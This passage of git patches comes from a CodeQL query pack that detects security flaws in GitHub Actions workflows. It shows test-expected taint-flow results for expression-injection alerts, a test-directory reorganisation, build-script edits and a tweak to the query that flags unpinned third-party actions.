${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | diff --git a/ql/src/test/test.expected b/ql/src/test/test.expected index 5dd2313e851..49ec00e20f7 100644 --- a/ql/src/test/test.expected +++ b/ql/src/test/test.expected @@ -27,6 +27,10 @@ edges | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | @@ -93,6 +97,11 @@ nodes | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | semmle.label | output workflow-output1: [workflow-output1] | | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | semmle.label | output workflow-output1: [workflow-output2] | @@ -144,6 +153,7 @@ subpaths | .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ github.event.after }}, which may be controlled by an external user. | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential injection from the ${{ steps.trim-url.outputs.trimmed_url }}, which may be controlled by an external user. | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | +| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential injection from the ${{ matrix.language }}, which may be controlled by an external user. | | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Potential injection from the ${{ inputs.config-path }}, which may be controlled by an external user. | | .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential injection from the ${{ steps.summary.outputs.value }}, which may be controlled by an external user. | | .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential injection from the ${{ steps.step.outputs.value }}, which may be controlled by an external user. | From 5b40d98849f571d683111ef8ab9e721be5cede89 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 28 Feb 2024 14:36:17 +0100 Subject: [PATCH 0079/1267] Update test db build script --- build-test-dbs.sh | 2 ++ 1 file changed, 2 insertions(+) diff --git a/build-test-dbs.sh b/build-test-dbs.sh index d8fc4359b92..bb85dc78a37 100755 --- a/build-test-dbs.sh +++ b/build-test-dbs.sh @@ -1,4 +1,6 @@ #!/bin/bash +rm -rf ql/lib/test/test.testproj || true +rm -rf ql/src/test/test.testproj || true rm -rf src-test.testproj || true rm -rf lib-test.testproj || true codeql database create src-test.testproj -l yaml -s ql/src/test From 6b11506abb7c42fe0c7cffcaf06f776fb1787873 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 29 Feb 2024 13:23:59 +0100 Subject: [PATCH 0080/1267] test: Add tests --- .gitignore | 1 + build-test-dbs.sh | 7 - codeql-workspace.yml | 3 +- ql/lib/codeql/actions/Ast.qll | 7 +- .../codeql/actions/ast/internal/Actions.qll | 2 - ql/lib/qlpack.yml | 1 - ...maries.ql => CompositeActionsSummaries.ql} | 0 ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 6 +- .../{CWE-094 => CWE-829}/UntrustedCheckout.md | 0 .../{CWE-094 => CWE-829}/UntrustedCheckout.ql | 2 +- ql/src/qlpack.yml | 1 - ql/src/test/test.expected | 162 ------------ ql/src/test/test.ql | 37 --- ql/test/codeql-pack.lock.yml | 16 ++ .../library-tests}/.github/workflows/test.yml | 0 .../test => test/library-tests}/test.expected | 0 ql/{lib/test => test/library-tests}/test.ql | 0 ql/test/qlpack.yml | 12 + .../.github/workflows/calling_composite.yml | 1 + .../.github/workflows/calling_workflow.yml | 1 + .../.github/workflows/reusable_workflow.yml | 1 + .../CWE-020/CompositeActionsSinks.expected | 15 ++ .../CWE-020/CompositeActionsSinks.qlref | 1 + .../CWE-020/CompositeActionsSources.expected | 12 + .../CWE-020/CompositeActionsSources.qlref | 2 + .../CompositeActionsSummaries.expected | 12 + .../CWE-020/CompositeActionsSummaries.qlref | 2 + .../CWE-020/ReusableWorkflowsSinks.expected | 8 + .../CWE-020/ReusableWorkflowsSinks.qlref | 2 + .../CWE-020/ReusableWorkflowsSources.expected | 12 + .../CWE-020/ReusableWorkflowsSources.qlref | 2 + .../ReusableWorkflowsSummaries.expected | 16 ++ .../CWE-020/ReusableWorkflowsSummaries.qlref | 2 + .../Security/CWE-020/action1}/action.yml | 1 + .../.github/workflows/argus_case_study.yml | 0 .../.github/workflows/changed-files.yml | 0 .../.github/workflows/comment_issue.yml | 28 +++ .../workflows/comment_issue_newline.yml | 10 + .../CWE-094}/.github/workflows/cross1.yml | 0 .../CWE-094}/.github/workflows/cross2.yml | 0 .../CWE-094}/.github/workflows/cross3.yml | 0 .../CWE-094/.github/workflows/discussion.yml | 8 + .../.github/workflows/discussion_comment.yml | 9 + .../CWE-094/.github/workflows/gollum.yml | 11 + .../workflows/image_link_generator.yml | 0 .../CWE-094}/.github/workflows/inter-job.yml | 0 .../CWE-094/.github/workflows/issues.yaml | 20 ++ .../CWE-094}/.github/workflows/matrix.yml | 0 .../CWE-094}/.github/workflows/no-flow1.yml | 0 .../CWE-094}/.github/workflows/no-flow2.yml | 0 .../.github/workflows/pull_request_review.yml | 14 ++ .../workflows/pull_request_review_comment.yml | 14 ++ .../.github/workflows/pull_request_target.yml | 16 ++ .../CWE-094/.github/workflows/push.yml | 16 ++ .../CWE-094}/.github/workflows/simple1.yml | 0 .../CWE-094}/.github/workflows/simple2.yml | 0 .../CWE-094}/.github/workflows/test.yml | 0 .../.github/workflows/workflow_run.yml | 16 ++ .../CriticalExpressionInjection.expected | 227 +++++++++++++++++ .../CWE-094/CriticalExpressionInjection.qlref | 1 + .../CWE-094/ExpressionInjection.expected | 233 ++++++++++++++++++ .../CWE-094/ExpressionInjection.qlref | 1 + .../Security/CWE-094/action1/action.yml | 14 ++ .../Security/CWE-094/action2/action.yml | 17 ++ .../.github/workflows/missing_perms.yml | 10 + .../CWE-275/.github/workflows/perms.yml | 13 + .../MissingActionsPermissions.expected | 1 + .../CWE-275/MissingActionsPermissions.qlref | 2 + .../workflows/actor_trusted_checkout.yml | 0 .../workflows/label_trusted_checkout.yml | 0 .../.github/workflows/unpinned_tags.yml | 11 + .../.github/workflows/untrusted_checkout.yml | 0 .../CWE-829/UnpinnedActionsTag.expected | 7 + .../Security/CWE-829/UnpinnedActionsTag.qlref | 1 + .../CWE-829/UntrustedCheckout.expected | 1 + .../Security/CWE-829/UntrustedCheckout.qlref | 1 + 76 files changed, 833 insertions(+), 216 deletions(-) delete mode 100755 build-test-dbs.sh rename ql/src/Security/CWE-020/{CompositeActionSummaries.ql => CompositeActionsSummaries.ql} (100%) rename ql/src/Security/{CWE-094 => CWE-829}/UntrustedCheckout.md (100%) rename ql/src/Security/{CWE-094 => CWE-829}/UntrustedCheckout.ql (98%) delete mode 100644 ql/src/test/test.expected delete mode 100644 ql/src/test/test.ql create mode 100644 ql/test/codeql-pack.lock.yml rename ql/{lib/test => test/library-tests}/.github/workflows/test.yml (100%) rename ql/{lib/test => test/library-tests}/test.expected (100%) rename ql/{lib/test => test/library-tests}/test.ql (100%) create mode 100644 ql/test/qlpack.yml rename ql/{src/test => test/query-tests/Security/CWE-020}/.github/workflows/calling_composite.yml (99%) rename ql/{src/test => test/query-tests/Security/CWE-020}/.github/workflows/calling_workflow.yml (99%) rename ql/{src/test => test/query-tests/Security/CWE-020}/.github/workflows/reusable_workflow.yml (99%) create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref rename ql/{src/test/composite-actions => test/query-tests/Security/CWE-020/action1}/action.yml (99%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/argus_case_study.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/changed-files.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/cross1.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/cross2.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/cross3.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/image_link_generator.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/inter-job.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/matrix.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/no-flow1.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/no-flow2.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/simple1.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/simple2.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/test.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml create mode 100644 ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/action1/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/action2/action.yml create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml create mode 100644 ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected create mode 100644 ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref rename ql/{src/test => test/query-tests/Security/CWE-829}/.github/workflows/actor_trusted_checkout.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-829}/.github/workflows/label_trusted_checkout.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml rename ql/{src/test => test/query-tests/Security/CWE-829}/.github/workflows/untrusted_checkout.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref diff --git a/.gitignore b/.gitignore index e147f87bf72..6c0e5c58738 100644 --- a/.gitignore +++ b/.gitignore @@ -2,3 +2,4 @@ **/*.testproj ql/lib/.codeql/ ql/src/.codeql/ +ql/test/.codeql/ diff --git a/build-test-dbs.sh b/build-test-dbs.sh deleted file mode 100755 index bb85dc78a37..00000000000 --- a/build-test-dbs.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash -rm -rf ql/lib/test/test.testproj || true -rm -rf ql/src/test/test.testproj || true -rm -rf src-test.testproj || true -rm -rf lib-test.testproj || true -codeql database create src-test.testproj -l yaml -s ql/src/test -codeql database create lib-test.testproj -l yaml -s ql/lib/test diff --git a/codeql-workspace.yml b/codeql-workspace.yml index ad62591967d..f00f92b346f 100644 --- a/codeql-workspace.yml +++ b/codeql-workspace.yml @@ -1,3 +1,4 @@ provide: - "**/ql/src/qlpack.yml" - - "**/ql/lib/qlpack.yml" \ No newline at end of file + - "**/ql/lib/qlpack.yml" + - "**/ql/test/qlpack.yml" diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index c2b1cda8277..2bbf5c8ac0d 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -270,7 +270,12 @@ class StepUsesExpr extends StepStmt, UsesExpr { override string getCallee() { result = uses.getGitHubRepository() } - override string getVersion() { result = uses.getVersion() } + override string getVersion() { + result = uses.getVersion() + or + not exists(uses.getVersion()) and + result = "main" + } override Expression getArgumentExpr(string key) { exists(Actions::With with | diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll index 2fb17eef88b..fe10441fd67 100644 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ b/ql/lib/codeql/actions/ast/internal/Actions.qll @@ -6,7 +6,6 @@ import codeql.actions.ast.internal.Yaml import codeql.files.FileSystem -// ALVARO: Make it private /** * Libraries for modeling GitHub Actions workflow files written in YAML. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. @@ -376,7 +375,6 @@ module Actions { } /** - * ALVARO * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ class Needs extends YamlNode { diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3c344549245..a0f348977ab 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -10,7 +10,6 @@ dependencies: codeql/dataflow: ^0.1.7 dbscheme: yaml.dbscheme extractor: yaml -tests: test groups: - yaml dataExtensions: diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionSummaries.ql rename to ql/src/Security/CWE-020/CompositeActionsSummaries.ql diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 12bc06481be..3c951a4e0b0 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -24,15 +24,15 @@ private predicate isTrustedOrg(string repo) { from StepUsesExpr uses, string repo, string version, WorkflowStmt workflow, string name where uses.getCallee() = repo and - uses.getVersion() = version and uses.getEnclosingWorkflowStmt() = workflow and ( workflow.getName() = name or not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name ) and - not isPinnedCommit(version) and - not isTrustedOrg(repo) + uses.getVersion() = version and + not isTrustedOrg(repo) and + not isPinnedCommit(version) select uses, "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + "', not a pinned commit hash", uses, uses.toString() diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.md b/ql/src/Security/CWE-829/UntrustedCheckout.md similarity index 100% rename from ql/src/Security/CWE-094/UntrustedCheckout.md rename to ql/src/Security/CWE-829/UntrustedCheckout.md diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql similarity index 98% rename from ql/src/Security/CWE-094/UntrustedCheckout.ql rename to ql/src/Security/CWE-829/UntrustedCheckout.ql index bb6c0d9a029..3c745b5d84a 100644 --- a/ql/src/Security/CWE-094/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -10,7 +10,7 @@ * @id actions/untrusted-checkout * @tags actions * security - * external/cwe/cwe-094 + * external/cwe/cwe-829 */ import actions diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 346079df984..aff53d45dde 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -11,4 +11,3 @@ defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true -tests: test diff --git a/ql/src/test/test.expected b/ql/src/test/test.expected deleted file mode 100644 index 49ec00e20f7..00000000000 --- a/ql/src/test/test.expected +++ /dev/null @@ -1,162 +0,0 @@ -edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | -| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | -| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | -| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | -| composite-actions/action.yml:4:3:4:14 | input 